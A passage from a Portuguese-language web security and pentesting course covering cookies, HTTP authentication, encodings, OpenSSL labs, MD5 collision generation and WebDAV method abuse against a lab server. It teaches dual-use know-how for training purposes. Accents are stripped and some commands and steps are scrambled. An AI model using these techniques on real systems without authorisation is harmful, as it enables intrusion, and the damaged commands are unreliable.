o objetivo de lembrar informaes de um usurio especfico. formado por uma cadeia

de caracteres, normalmente organizada em pares nome/valor, separados por ponto e
vrgula. Uma vez definido, enviado pelo navegador em toda requisio subsequente
ao mesmo domnio. Dois usos principais so a manuteno de sesso, uma vez que isso
no suportado nativamente pelo protocolo, e a autenticao de usurios.
Alguns atributos podem ser definidos para os cookies, alm dos pares contendo nome e
valor (Stuttard e Pinto, 2007):
1 expires: define por quanto tempo o cookie vlido e, assim, permite que o estado se
mantenha aps o navegador ser encerrado.
1 domain: define para quais domnios o cookie vlido, desde que o servidor seja um
membro daqueles.
1 path: define os caminhos para os quais o cookie vlido.

1 secure: demanda que o cookie seja enviado somente em requisies feitas por meio de HTTPS.
1 HttpOnly: quando definido, impede que seja acessado por cdigo executado no lado do
cliente. Porm, nem todo navegador honra esse atributo.
Autenticao HTTP
O protocolo HTTP possui dois mtodos nativos, Basic e Digest, para autenticar usurios
antes que acessem recursos protegidos do servidor (Franks et al., 1999).

Ambos seguem o seguinte fluxo geral:
1. Usurio solicita um recurso protegido do servidor.
2. Se o usurio ainda no se autenticou, uma resposta com cdigo de estado 401
Unauthorized enviada ao navegador, juntamente com um cabealho WWWAuthenticate, que define o tipo requerido de autenticao.
BASE64
Esquema de
codificao que utiliza
um subconjunto de
64 elementos da
tabela ASCII para
representao
de informaes.
um cabealho Authorization, codificados em BASE64, no caso de Basic, e protegidos pelo

algoritmo MD5, no caso de Digest.
4. Se as credenciais enviadas forem vlidas, o servidor fornece o recurso solicitado e as
credenciais so includas em toda requisio subsequente ao mesmo domnio. Se no,

o fluxo retorna ao segundo passo.
A impossibilidade de travamento de conta por mltiplas tentativas sucessivas e invlidas
de autenticao e a inexistncia de mecanismos de encerramento de sesso (exceto
fechando o navegador) so alguns dos problemas desses mtodos de autenticao.
3. O usurio fornece usurio e senha em uma caixa de dilogo, os quais so enviados, em
19
Protocolo HTTP
Quais as principais caractersticas do protocolo HTTP?
Como funciona o protocolo HTTP?
Como requisies HTTP oriundas de um mesmo usurio podem ser agrupadas em uma
nica conversao?
Esquemas de codificao
Um processo de codificao consiste em substituir elementos de um conjunto por itens
de outro, segundo uma regra pr-estabelecida, de modo que o simples conhecimento das
transformaes de ida e volta suficiente para realizar as tradues entre os dois domnios.
Em segurana de aplicaes web, esquemas de codificao podem ser empregados na
proteo contra alguns ataques, como o cross-site scripting, por exemplo, e, em testes de
invaso, para a construo correta dos vetores de teste, quando estes so passados por
meio de URLs, alm do contorno de filtros de entrada.
Codificao de URL
Uma URL ou mais geralmente uma URI pode conter somente caracteres ASCII imprimveis, conforme especificado pela RFC 3986. Alguns deles possuem significado especial
em URLs, atuando como delimitadores, e, assim, so classificados como reservados.
Quando precisam ser utilizados como dados, nesse contexto, devem ser codificados,
para que possam ser corretamente identificados como tais. O mtodo empregado,
chamado de codificao de URL ou codificao percentual, consiste no uso de um
caractere % seguido de dois dgitos hexadecimais, que representam o valor numrico
do dado sendo codificado.
Por exemplo, um espao, cujo valor ASCII 32, mapeado para %20, de acordo com esse
20
esquema. Note que, em URLs, espaos tambm podem ser substitudos pelo caractere +.
importante mencionar que caracteres no imprimveis devem sempre ser codificados
segundo esse esquema, assim como os reservados, enquanto que os demais elementos
podem ser transformados, embora isso no seja obrigatrio.
A Figura 1.9 ilustra a codificao de todos os caracteres reservados de acordo com a RFC
3986. importante mencionar que caracteres no imprimveis devem sempre ser codificados segundo esse esquema, assim como os reservados, enquanto que os demais elementos podem ser transformados, se desejado, embora isso no seja obrigatrio.
Caractere
reservado
Caractere
reservado
Caractere
codificado
%21
%3D
%2A
%2B
%27
%24
%28
%2C
%29
%2F
%3B
%3F
%3A
%23
%40
%5B
&
%26
%5D
Codificao HTML
Alguns caracteres possuem significado especial em HTML e, assim, se for necessrio
exibi-los como parte do contedo, necessrio codific-los, para que no sejam considerados como metacaracteres pelo navegador web. Existem trs maneiras de efetuar essa
tarefa, descritas a seguir:
1 &<nome da entidade>; os caracteres especiais possuem nomes especficos em

HTML, os quais podem ser empregados no processo de codificao. Por exemplo, o
caractere < codificado como <, pois lt o nome de entidade especificado pelo
padro para esse smbolo.
1 &#<nmero decimal>; utiliza o valor Unicode do caractere, em base decimal. Por

exemplo, < codificado como <.
1 &#x<nmero hexadecimal>; idem ao caso acima, porm, representado em base

hexadecimal. Aplicando ao mesmo exemplo, obtm-se <.
Figura 1.9
Codificao dos
caracteres
reservados em URL.
Caractere
codificado
21
22
Atividade 1 Arquiteturas e tecnologias de aplicaes web
Identifique a arquitetura e as tecnologias empregadas por uma das aplicaes web utilizadas pela empresa em que trabalha. Desenhe a topologia de rede contendo os elementos
principais que suportam a aplicao.
Atividade 2 Mecanismos criptogrficos

Nesta atividade, o aluno aprender como utilizar os diversos mecanismos criptogrficos
vistos na sesso de aprendizagem. A ferramenta que ser empregada o OpenSSL, alm
de outros programas acessrios. Para iniciar esta atividade, abra um terminal na mquina
virtual do aluno, mude para o diretrio Arquivos do Curso/sesso-01 e siga o roteiro abaixo.
Cifras simtricas
O Advanced Encryption Standard (AES) uma cifra simtrica de blocos adotada pelo
governo norte-americano e descrita no documento FIPS PUB 197. O AES especifica o algoritmo Rijndael, operando sobre blocos de dados de 128 bits e com chaves de 128, 192 ou
256 bits. Note que a especificao original de Rijndael permite trabalhar com tamanhos de
blocos e chaves adicionais.
1. Gerao de chaves AES
O primeiro passo antes de se utilizar uma cifra simtrica na proteo do sigilo de informaes
gerar uma chave o mais aleatria possvel e distribu-la seguramente a todas as partes autorizadas. Quando o objetivo proteger uma comunicao, isso realizado como parte de um protocolo de estabelecimento de chaves. Por outro lado, se o propsito prover o sigilo de dados
armazenados, a chave gerada por um PRNG ou por um hardware criptogrfico.
Nesta atividade, vamos utilizar o comando rand, do OpenSSL, para a gerao de uma chave
de 128 bits:
openssl rand hex 16
A sada corresponde a uma cadeia de 32 dgitos hexa, que totaliza 128 bits, e pode ser
empregada como chave de um AES-128.
O comando para cifrar uma mensagem com o algoritmo AES, usando uma chave de 128 bits,
no modo de operao CBC, :
openssl aes-128-cbc in <arquivo a ser cifrado> -out <arquivo cifrado>

-K <chave em hexadecimal>
-iv <vetor de inicializao>
Cifre o arquivo arq002.txt com a chave gerada no passo 1 e com iv = 0, armazenando o resultado
em arq002.enc. Verifique o tamanho desse arquivo e observe que ele mltiplo de 16 bytes
Captulo 1 - Roteiro de Atividades
2. Cifrando mensagens
(128 bits tamanho do bloco AES), embora o arquivo original no seja. Isso ocorre porque cifras
23
simtricas de blocos operam sempre em unidades de tamanho fixo pr-definido e, quando o

ltimo bloco no mltiplo desse tamanho, ele completado em um processo de padding.
Repita o processo para o arquivo arq001.txt, armazenando o resultado em arq001.enc,
e verifique os tamanhos dos dois arquivos. Note que um bloco adicional de 16 bytes foi
adicionado ao arquivo cifrado, apesar do arquivo original ser mltiplo do tamanho do bloco
utilizado pelo AES. Nesse caso, um bloco de padding deve ser includo, para que o algoritmo
possa diferenciar os dois casos, no processo de deciframento.
3. Decifrando mensagens
O comando para decifrar mensagens com o algoritmo AES, usando uma chave de 128 bits,
no modo de operao CBC, :
openssl aes-128-cbc d in <arquivo cifrado> -out <arquivo decifrado>

-K <chave em hexadecimal>
-iv <vetor de inicializao>
Decifre o arquivo arq002.enc, armazenando o resultado em arq002.plain. Verifique que o
contedo desse arquivo o mesmo de arq002.txt.
Repita o processo com uma chave diferente da utilizada no processo de ciframento. Uma
mensagem de erro ser exibida, pois somente possvel decifrar o arquivo com a mesma
chave utilizada para proteg-lo.
Cifras assimtricas
O RSA, cujo nome deriva dos criadores Rivest, Shamir e Adleman, foi a primeira cifra assimtrica da histria da criptografia e baseada na dificuldade da fatorao de nmeros inteiros
grandes. Atualmente, o criptossistema de chave pblica mais utilizado, principalmente, na
negociao de tneis SSL/TLS.
1. Gerao de um par de chaves RSA
Um par de chaves RSA consiste em uma chave pblica (e, n) e da chave privada correspondente d. Execute o comando abaixo para gerao de um par de chaves de k bits, com k = 2048.
openssl genrsa out <arquivo que armazenar par de chaves>

<tamanho em bits da chave>
2. Visualizao do par de chaves RSA
Para visualizar o par de chaves gerado, execute o seguinte comando:
openssl rsa in <arquivo contendo par de chaves>

fcil observar que o formato da sada no adequado para a visualizao de cada uma das
24
chaves. Para uma sada mais amigvel, tente o seguinte comando:
openssl rsa in <arquivo contendo par de chaves> -text noout

A sada agora est em hexadecimal e tm-se: chave pblica = (publicExponent, modulus) e
chave privada = (privateExponent).
3. Exportao da chave pblica
Para que as pessoas possam cifrar mensagens para voc, necessrio que elas tenham uma
cpia autntica da sua chave pblica. Normalmente, isso feito por meio de certificados
digitais, mas, por enquanto, apenas exportaremos a chave pblica para um arquivo separado, da seguinte maneira:
openssl rsa in <arquivo contendo par de chaves> -pubout >

<arquivo que conter chave pblica>
4. Cifrando mensagens
Nesse passo necessrio disponibilizar sua chave pblica para aqueles que queiram
enviar-lhe mensagens sigilosas. Assim, fornea o arquivo gerado no passo anterior para
um de seus colegas.
Crie um arquivo texto qualquer menor que 200 bytes e execute o comando abaixo para
cifr-lo, usando a chave pblica previamente fornecida.
openssl rsautl in <arquivo a ser cifrado> -out <arquivo cifrado>

-inkey <arquivo de chave pblica do destinatrio>
-pubin encrypt
Verifique o contedo do arquivo cifrado e veja que ele binrio, no tendo nenhuma relao
com o arquivo em claro. Porm, observe que o tamanho do arquivo exatamente o mesmo
que o tamanho da chave.
5. Decifrando mensagens
Repasse o arquivo gerado a seu colega que disponibilizou a chave pblica, para que ele
possa recuperar a mensagem original. Envie tambm o arquivo cifrado a outro colega que
no possua a chave privada correspondente.
O comando para deciframento :
openssl rsautl in <arquivo cifrado> -out <arquivo decifrado>

-inkey <arquivo com chave privada>
-decrypt
O destinatrio correto conseguir decifrar o arquivo e recuperar o arquivo original,
enquanto que o usurio que no possui a chave privada correspondente obter erro ao
executar o comando acima.
6. Arquivos grandes
Repita o passo explicado no item 4 para um arquivo que seja maior que o mdulo da chave
(divida o tamanho em bits por 8). O que acontece? Esse erro ocorre porque o RSA no pode
ser utilizado para proteger mensagens maiores que o tamanho do mdulo.
1. Cite trs usos de funes de hash criptogrficas.
Funes de hash criptogrficas
25
2. Listagem de funes de hash criptogrficas suportadas pelo OpenSSL
O OpenSSL suporta nativamente diversas funes de hash criptogrficas, alm de outros

algoritmos criptogrficos. Para verificar a lista de hashes suportados, digite:
man dgst
3. Clculo de hashes
A sintaxe utilizada pelo OpenSSL para clculo de hashes de um arquivo qualquer :
openssl dgst -<algoritmo> <lista de arquivos>

Calcule os hashes dos arquivos abaixo e verifique que so exatamente os mesmos que os
apresentados na tabela.
MD5
arqhash01.txt ()
d41d8cd98f00b204e9800998ecf8427e
arqhash02.txt (a)
0cc175b9c0f1b6a831c399e269772661
arqhash03.txt (abc)
900150983cd24fb0d6963f7d28e17f72
SHA-1
arqhash01.txt ()
da39a3ee5e6b4b0d3255bfef95601890afd80709
arqhash02.txt (a)
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8
arqhash03.txt (abc)
a9993e364706816aba3e25717850c26c9cd0d89d
RIPEMD-160
arqhash01.txt ()
9c1185a5c5e9fc54612808977ee8f548b2258d31
arqhash02.txt (a)
0bdc9d2d256b3ee9daae347be6f4dc835a467ffe
arqhash03.txt (abc)
8eb208f7e05d987a9b044a8e98c6b087f15a0bfc
4. Colises em MD5 Documentos
Visualize com a aplicao evince os arquivos letter_of_rec.ps e order.ps, criados por Magnus
Daum e Stefan Lucks, e veja que so diferentes. Calcule tambm o MD5 dos arquivos, usando
o comando do exerccio anterior, e observe que eles colidem.
Repita o exerccio com os arquivos BarackObama.pdf, JohnMcCain.pdf e ParisHilton.pdf,
criados por Marc Stevens, Arjen Lenstra e Benne de Weger.

5. Colises em MD5 Programas
Execute os programas evil e good para constatar que realizam tarefas diferentes, embora
possuam o mesmo MD5.
6. Gerao de colises em MD5
Descompacte o arquivo fastcoll_v1.0.0.1_source.zip, digitando o comando:
unzip fastcoll_v1.0.0.1_source.zip
Em seguida, gere um executvel, compilando os fontes obtidos:
g++ *.cpp o md5col

26
Agora, execute o arquivo gerado para obter um par de arquivos, msg1 e msg2, para os quais
o MD5 colide. Caso a execuo demore mais que 5 minutos, cancele o programa e o reinicie.
./md5col
Verifique com o comando cmp que os arquivos gerados so diferentes e, com o comando
OpenSSL, que os hashes, mesmo assim, colidem:
cmp msg1 msg2

openssl dgst md5 msg1 msg2
Execute o programa md5col mais uma vez para gerar uma nova coliso e compare os valores
MD5 das mensagens geradas.
Assinaturas digitais
O RSA, alm de ser uma cifra, tambm um algoritmo de assinatura digital, que utiliza exatamente a mesma construo e processo de gerao de chaves. A assinatura gerada por
meio da chave privada e a verificao ocorre utilizando-se a chave pblica.
1. Gerao de um par de chaves RSA
Conforme mencionado, o processo de gerao de chaves o mesmo que os das cifras RSA.
Assim, execute o comando abaixo para gerao de um par de chaves de 2048 bits:
openssl genrsa out <arquivo que armazenar par de chaves>

<tamanho em bits da chave>
2. Exportando a chave pblica
Para que pessoas possam verificar assinaturas digitais geradas por voc, necessrio que elas
tenham uma cpia autntica da sua chave pblica. Normalmente, isso feito por certificados
digitais, mas, por enquanto, apenas exportaremos a chave pblica para um arquivo separado:
openssl rsa in <arquivo contendo par de chaves> -pubout >

3. Assinando mensagens
O OpenSSL implementa o RSA com recuperao da mensagem e, por isso, somente podem
ser assinados dados menores que o tamanho da chave. Escolha um arquivo que deseja
assinar digitalmente e execute o comando abaixo.
openssl rsautl -sign

in <arquivo a ser assinado>
-out <arquivo que armazenar a assinatura>
pkcs
Repasse o arquivo de assinatura digital a outro aluno, juntamente com sua chave pblica,
para que ele possa verificar a assinatura.
4. Verificando assinaturas
Para verificar a assinatura enviada pelo seu colega, utilize o comando:
openssl rsautl verify
-inkey <arquivo contendo chave privada>
-in <arquivo contendo assinatura>
27
-inkey <arquivo contendo chave pblica>

-pubin
-pkcs
-out <arquivo recuperado da assinatura>
Se a assinatura for vlida, nenhuma mensagem ser exibida e o arquivo original ser recuperado e gravado no arquivo especificado pelo parmetro out.
Certificados digitais
Conforme discutido, em criptossistemas assimtricos fundamental que sejam utilizadas
chaves pblicas autnticas. O no atendimento desse requisito de segurana torna os protocolos vulnerveis a ataques man-in-the-middle, por exemplo. Uma maneira de solucionar esse
problema consiste em encapsular uma chave pblica em um certificado digital, que digitalmente assinado por uma terceira parte confivel, chamada de autoridade certificadora.
O objetivo desta atividade ilustrar como certificados podem ser requisitados e como o
processo de emisso de certificados digitais, por parte da autoridade certificadora.
1. Gerando a requisio de certificado
Considere-se o par de chaves gerado na atividade sobre assinaturas digitais. Para que terceiros possam verificar assinaturas geradas com a chave privada em questo, eles precisam
ter acesso chave pblica autntica correspondente, a qual normalmente distribuda
encapsulada em um certificado digital. Para esse fim, o primeiro passo aps a gerao do
par de chaves preparar uma requisio (no formato PKCS #10) a ser enviada a uma autoridade certificadora, para emisso do certificado. O comando a ser executado :
openssl req new key <arquivo contendo par de chaves>

out <arquivo que conter requisio>
sha1
O OpenSSL solicitar as informaes a serem includas no certificado:
1 Country Name (2 letter code) [GB]: - Ex.: br

1 State or Province Name (full name): - Ex.: sp
1 Locality Name (eg, city) [Newbury]: - Ex.: Campinas
1 Organization Name (eg, company) [My Company Ltd.]: - Ex.: RNP
1 Organizational Unit Name (eg, section) []: - Ex.: ESR
1 Common Name (eg, your name or your servers hostname) []: - Ex.: Fulano de Tal
1 Email Address []: - Ex.: fulano@esr.rnp.br

1 A challenge password []: - Ex.: senhadificil
1 An optional company name []: - Ex.: Outro
2. Exibindo a requisio de certificado
Para visualizar a requisio, execute o seguinte comando:
openssl req in <arquivo de requisio de certificado>

fcil observar que o formato de sada no adequado para a visualizao da requisio.
Para uma sada mais amigvel, tente o seguinte comando:
openssl req in <arquivo de requisio de certificado> text noout

28
3. Emitindo o certificado
A requisio gerada deve ser encaminhada autoridade certificadora para emisso do

certificado. Na prtica, tambm necessrio provar sua identidade, pessoalmente, por meio
de documentos apropriados (se no fosse assim, como seria possvel atestar que a chave
pblica pertence a fulano?). O software para uma pequena CA j est instalado nos computadores e, assim, poderemos ver como o certificado gerado a partir da requisio.
O comando que pode ser executado para emitir o certificado :
openssl ca md sha1
in <arquivo de resquisio de certificado>
out <arquivo que conter o certificado>
Os dados da solicitao so exibidos e o OpenSSL pergunta se se deseja assinar o certificado. Aps uma resposta positiva, um certificado ser emitido e armazenado no diretrio /
etc/ssl/ca-esr-rnp/newcerts, com cpia no arquivo especificado pelo parmetro out.
4. Exibindo as informaes do certificado
Para visualizar o contedo do certificado, execute o seguinte comando:
openssl x509 in <certificado digital> text noout

5. Verificando a assinatura da AC sobre o certificado
De nada adianta receber um certificado digital e no verificar as assinaturas digitais na cadeia

de certificados que levam AC raiz. Se esse importante passo no for realizado, continuamos
sem poder atestar a autenticidade da chave pblica recebida. Verifique com o comando abaixo
o certificado emitido, considerando que o certificado da AC raiz cacert.pem:
openssl verify CAfile <certificado da AC raiz>

<certificado a ser verificado>
Se a validao no der erros, o nome do certificado ser escrito seguido de Ok.
6. Extraindo a chave pblica contida no certificado
Para cifrar dados para uma pessoa ou verificar assinaturas que ela tenha gerado, necessrio extrair a chave pblica do certificado digital validado. O comando que realiza isso :
openssl x509 in <certificado digital> -pubkey noout >

Esta atividade tem o objetivo de ilustrar os protocolos HTTP e HTTPS, permitindo que o
aluno compreenda diversos aspectos envolvidos em uma interao com uma aplicao web.
O objetivo desta atividade ilustrar como so requisies e respostas HTTP, por meio da
anlise dos pacotes de uma solicitao ao servidor web de exemplo. Os passos que devem
ser executados esto descritos nos itens a seguir:
1. Inicie o Wireshark, presente no menu Aplicativos\Curso Ferramentas. Para conseguir cap-
turar os pacotes, a aplicao deve ser executada em modo privilegiado e, por isso, uma
senha ser solicitada. Digite esruser e clique em Ok.
Requisio e resposta
29
2. Clique no primeiro cone da barra de ferramentas para listar as interfaces de rede dispon-
veis para captura. Na caixa de dilogo que aparece, clique em Options, na linha eth1. No
campo Capture filter, digite tcp port http e clique em Start para iniciar a captura de pacotes.
3. Inicie o Firefox e digite na barra de endereos exemplo.esr.rnp.br.
4. Pare a captura de pacotes no Wireshark clicando no quarto boto da barra de ferramentas
(Stop the running live capture).

5. Role a barra da janela de captura para exibir os primeiros pacotes capturados. Procure
pela linha contendo GET / HTTP/1.1 (linha 4), clique com o boto esquerdo e selecione
Follow TCP Stream.
6. Uma janela ser exibida contendo a requisio GET inicial e a resposta fornecida pelo
servidor web. Observe os diversos cabealhos presentes e que o corpo da resposta

contm um documento HTML.
7. Para finalizar, clique em Fechar e depois em Clear.
Mtodos
Nesta atividade sero explorados diversos outros mtodos HTTP, que no GET e POST, e
ilustradas algumas vulnerabilidades que podem decorrer de um servidor mal configurado:
1. Inicie um terminal, clicando no cone presente na rea de trabalho.
2. Para verificar os mtodos suportados pelo servidor web, digite:
telnet exemplo.esr.rnp.br 80
OPTIONS / HTTP/1.0
Host: exemplo.esr.rnp.br
3. Pressione Enter duas vezes e analise a resposta dada pelo servidor. Observe que o WebDAV
est habilitado, bem como mtodos perigosos como DELETE, COPY e MOVE.
O WebDAV compreende um conjunto de comandos que podem ser utilizados para
gerenciar arquivos em um servidor web de maneira colaborativa. Quando disponibilizado para o pblico externo, pode facilitar o comprometimento do servidor, ao
permitir acesso ao sistema de arquivos.
4. Use o utilitrio cadaver para acessar as funcionalidades DAV do servidor:
cadaver http://exemplo.esr.rnp.br
5. Para listar os comandos disponveis, digite:
help
30
6. Liste os arquivos disponveis no sistema de arquivos:
ls
7. Faa o upload do arquivo arq001.txt e liste o diretrio novamente:
put arq001.txt
ls
8. O arquivo copiado pode ser removido por meio do comando delete do DAV, mas, como
exerccio, remova-o por meio de uma requisio HTTP, em uma nova janela de terminal:
DELETE /arq001.txt HTTP/1.0
9. Pressione Enter duas vezes e veja o resultado no cadaver, listando os arquivos presentes
no diretrio.
10. O mtodo HEAD equivalente ao GET, com a diferena de que o corpo da resposta no
fornecido. Vejamos:
HEAD / HTTP/1.1
11. Pressione Enter duas vezes e observe a ausncia do corpo da mensagem.
Cdigos de estado
Nas atividades anteriores, o servidor retornou sempre o cdigo de estado 2XX, indicando
que a requisio foi atendida com sucesso. Na presente tarefa, sero apresentadas situaes em que outros cdigos so fornecidos pelo servidor.
1. Em uma janela de terminal, digite os comandos abaixo, finalizando com Enter duas vezes:
telnet w3s.esr.rnp.br 80
GET / HTTP/1.1
Host: w3s.esr.rnp.br
A resposta com cdigo 302 indica ao navegador que o recurso foi encontrado, mas que um
redirecionamento necessrio para acessar o recurso.
2. Em uma janela de terminal, digite os comandos abaixo, finalizando com Enter duas vezes:
GET /inexistente HTTP/1.1
A resposta com cdigo 404 indica ao navegador que o recurso no foi encontrado no servidor.
3. Em uma janela de terminal, digite os comandos abaixo:
Como no existe um mtodo BLA, o servidor retorna uma resposta com cdigo de estado
501 Method not implemented.
Autenticao Basic
A autenticao bsica do protocolo HTTP pode ser configurada para restringir acesso a
reas sensveis do servidor web. Conforme visto, algumas desvantagens desse mtodo
incluem a impossibilidade de travamento de conta e de encerramento de sesses ociosas.
Siga o seguinte roteiro para essa atividade:
BLA
31
1. Inicie nova captura no Wireshark, da mesma maneira que na atividade de Requisio
e Resposta.
2. Caso a mensagem Save capture file before starting a new capture? aparea, clique em
Continue without saving.

3. Inicie o navegador e acesse exemplo.esr.rnp.br/basic.
4. Fornea para usurio e senha o texto esruser.
5. Pare a captura de pacotes no Wireshark, clicando no quarto boto da barra de ferra-
mentas (Stop the running live capture).

pela primeira linha contendo GET /basic HTTP/1.1 (linha 4), clique com o boto esquerdo
e selecione Follow TCP Stream.
7. Observe que o servidor retornou uma resposta com cdigo 401, o que fez com que o nave-
gador exibisse a caixa de dilogo solicitando usurio e senha. Clique em Filter out this stream.
8. Procure pela nova requisio contendo GET e repita o processo do Passo 6.
9. Veja que o navegador adicionou o cabealho Authorization: Basic ZXNydXNlcjplc3J1c2Vy
requisio. A ltima parte corresponde ao usurio e senha em BASE64, que pode ser
decodificada com o comando:
echo ZXNydXNlcjplc3J1c2Vy | base64 -d; echo -e \n

10. Para finalizar, clique em Fechar e depois em Clear.
Autenticao Digest
A autenticao Digest do protocolo HTTP, assim como o modo Basic, pode ser configurada
para restringir acesso a reas sensveis do servidor web e possui as desvantagens de no
ser possvel travar contas, nem de encerrar sesses ociosas. A grande diferena que ela
transmite o usurio e senha protegidos por mtodos no reversveis. Para estudar esse
modo de autenticao, siga o seguinte roteiro:
1. Inicie nova captura no Wireshark, da mesma maneira que na atividade de Requisio
e Resposta.
2. Caso a mensagem Save capture file before starting a new capture? aparea, clique em
Continue without saving.

3. Se o Firefox j estiver aberto, pressione Ctrl + Shift + Del para limpar o histrico recente.
4. Acesse exemplo.esr.rnp.br/digest pelo Firefox.

5. Fornea para usurio e senha o texto esruser.
pela primeira linha contendo GET /digest HTTP/1.1 (linha 4), clique com o boto esquerdo
e selecione Follow TCP Stream.
7. Observe que o servidor retornou uma resposta com o cdigo 401, o que fez com que o
navegador exibisse a caixa de dilogo solicitando usurio e senha. Contudo, diferentemente do modo Basic, o cabealho WWW-Authenticate est definido como Digest e um
nonce foi fornecido. Clique em Filter out this stream.
8. Procure pela nova requisio contendo GET e repita o processo do passo 6.
32
9. Veja que o navegador adicionou o cabealho Authorization: Digest requisio, com
diversos parmetros. O elemento response demonstra o conhecimento da senha pelo

usurio e resultado da aplicao de uma funo de hash criptogrfica concatenao
de uma srie de informaes.
10. Para finalizar este exerccio, clique em Fechar e depois em Clear.
HTTPS
O protocolo HTTPS basicamente consiste no transporte de HTTP por um canal SSL/TLS.
Se o servidor estiver bem configurado, o tnel atender os requisitos de confidencialidade,
integridade, autenticidade da origem da mensagem e de entidades. Siga o seguinte roteiro
para constatar isso:
1. Inicie nova captura no Wireshark, da mesma maneira que na atividade de Requisio e
Resposta, mas preencha Capture filter com tcp port https.

2. Acesse https://w3s.esr.rnp.br com o Firefox.

pela linha contendo Client Hello (linha 4), que o incio da negociao TLS.
5. A primeira troca de dados acontece a partir da linha 12 (Application Data). Selecione-a e,
no painel central, selecione Secure Socket Layer. Role o painel inferior e observe que no
h contedo legvel como parte da mensagem.
33
Bibliografia 1
1 BARKER, Elaine; BARKER, William; BURR, William; POLK, William e SMID, Miles.
Recommendation for key management part 2: Best practices for key management
organization. NIST Special Publication 800-57, NIST, 2007b.
1 BERNERS-LEE, Tim; FIELDING, Roy T. e MASINTER, Larry. RFC 3986: Uniform Resource
Identifier (URI): Generic Syntax, 2005.
1 FIELDING, Roy T.; GETTYS, James; MOGUL, Jeffrey C.; NIELSEN, Henrik Frystyk; MASINTER,
Larry; LEACH, Paul J. e BERNERS-LEE, Tim. RFC 2616: Hypertext Transfer Protocol
HTTP/1.1, 1999.
1 FRANKS, John; HALLAM-BAKER, Phillip M.; HOSTETLER, Jeffery L.; LAWRENCE, Scott D.;
LEACH, Paul J.; LUOTONEN, Ari e STEWART, Lawrence C. RFC 2617: HTTP Authentication:
Basic and Digest Access Authentication, 1999.
1 KISSEL, Richard; STINE, Kevin; SCHOLL, Matthew; ROSSMAN, Hart; FAHLSING, Jim e
GULICK, Jessica. Security considerations in the system development life cycle. NIST Special
Publication SP 800-64, National Institute of Standards and Technology, 2008.
1 LITCHFIELD, David. The Oracle Hackers Handbook Hacking and Defending Oracle. Wiley
Publishing, Inc., 2007.
1 MCGRAW, Gary. Software Security: Building Security In. Addison-Wesley Professional, 2006.
1 MENEZES, Alfred J.; VAN OORSCHOT, Paul. C. e VANSTONE, Scott. A. Handbook of Applied
Cryptography. CRC Press, 5th edition, 2001.
1 MEUCCI, Matteo et al. OWASP testing guide v3.0. OWASP, 2008.

1 ORACLE. Your First Cup: an Introduction to the Java EETM Platform. PartNo: 821177010.
Junho. Oracle, 2010.
1 PCI. Payment Card Industry (PCI) Data Security Standard Requirements and Security
Assessment Procedures v. 1.2.1. PCI Security Standards Council, 2009a.
1 PCI. Payment Card Industry (PCI) Payment Application Data Security Standard (PA-DSS)
version 1.2.1. PCI Security Standards Council, 2009b.
1 SEACORD, Robert C. Secure Coding in C and C++. Addison-Wesley Professional, 2005.

1 SHANNON, Claude. Communication Theory of Secrecy Systems, Bell Systems Technical
Journal, Vol. 28, p. 656-715, 1949.
1 SHKLAR, Leon e ROSEN, Richard. Web Application Architecture: Principles, Protocols and
Practices. 2. Edio. Wiley, 2009.
34
1 STEVENS, Marc; SOTIROV, Alexander; APPELBAUM, Jacob; LENSTRA, Arjen; MOLNAR,

David; OSVIK, Dag Arne e DE WEGER, Benne. Short Chosen-Prefix Collisions for MD5 and
the Creation of a Rogue CA Certificate. In: Proceedings of the 29th Annual International
Cryptology Conference on Advances in Cryptology LNCS. Vol. 5677. p. 55-69. Springer-Verlag,
2009.
1 STUTTARD, Dafydd; PINTO, Marcus. The Web Application Hackers Handbook. Wiley
1 VAN DER STOCK, Andrew; CRUZ, Dinis; CHAPMAN, Jenelle; LOWERY, David; KEARY, Eoin;
MORANA, Marco M.; ROOK, David; WILLIAMS, Jeff e PREGO, Paulo. OWASP code review
guide v1.1. OWASP, 2008.
1 WANG, Xiaoyun; YU, Hongbo. How to break MD5 and other hash functions. Eurocrypt 2005.
Springer-Verlag, 2005.
1 WIESMANN, Adrian; CURPHEY, Mark; VAN DER STOCK, Andrew e STIRBEI, Ray. A guide to
building secure web applications and web services. OWASP, 2005.
1 WYSOPAL, Chris; NELSON, Lucas; ZOVI, Dino Dai e DUSTIN, Elfriede. The Art of Software
Captulo 1 - Bibliografia 1
Security Testing: Identifying Software Security Flaws. Symantec Press, 2006.
35
36
2
objetivos
Reconhecimento e mapeamento
Apresentar uma metodologia de teste de invaso de aplicaes web e as principais
ferramentas que podem ser utilizadas no processo, abordando, especialmente,
as fases de reconhecimento e mapeamento.
conceitos
Tipos e metodologia de teste de invaso, proxy de interceptao, web spiders,

fuzzers, varredores de portas e servios, varredores de vulnerabilidades,
reconhecimento, mapeamento, controles no lado cliente.
Introduo
Teste de invaso, tambm chamado de teste de intruso, teste de penetrao ou pentest,
um mtodo utilizado para verificar a segurana de um ambiente, plataforma ou sistema,
Mtodo comumente
automatizado
para identificar
vulnerabilidades em
elementos e sistemas
de rede. Cada um dos
ativos pertencentes ao
escopo da varredura
testado contra uma
srie de fraquezas
conhecidas para a
plataforma especfica.
por meio da simulao de ataques reais explorando as vulnerabilidades encontradas.

Diferentemente de uma varredura de vulnerabilidades, que muitas vezes recorre ao
simples uso de ferramentas automatizadas, pentest um processo cclico que depende
principalmente do conhecimento tcnico do auditor de segurana que o realiza.
Este fato acaba sendo ressaltado quando o teste realizado contra aplicaes web, devido
s caractersticas nicas que cada uma delas apresenta, por serem normalmente desenvolvidas para uso em uma nica empresa ou entidade.
Segundo Scarfone et al (2008), testes de invaso tambm so teis para medir: a habilidade
da equipe de detectar e se defender contra ataques reais do ambiente alvo; o nvel necessrio de sofisticao de um atacante para comprometer o sistema; quo bem um sistema se
comporta sob ataques, e as medidas adicionais que precisam ser adotadas para mitigar os
riscos identificados. Alguns dos tipos de teste descritos no The Open Source Security Testing
OSSTMM
Metodologia aberta
para realizao de
testes de segurana
em ambientes,
visando eliminar
aspectos subjetivos da
atividade, por meio da
definio de processos
reprodutveis e
mtricas para avaliao
dos resultados.
Methodology Manual OSSTMM 3 (Herzog, 2010) visam, justamente, verificar os dois primeiros itens da lista acima, em vez da segurana do prprio alvo.
Testes de penetrao podem ser classificados em alguns tipos, de acordo com a quantidade de informao que apresentada ao auditor de segurana:
1 Teste caixa-preta: visa simular as mesmas condies de um atacante real, que

possui acesso somente s informaes pblicas do alvo, como endereos IP externos,
nomes de domnio e ramo de negcio da entidade.
Captulo 2 - Reconhecimento e mapeamento
Varredura de
vulnerabilidades
37
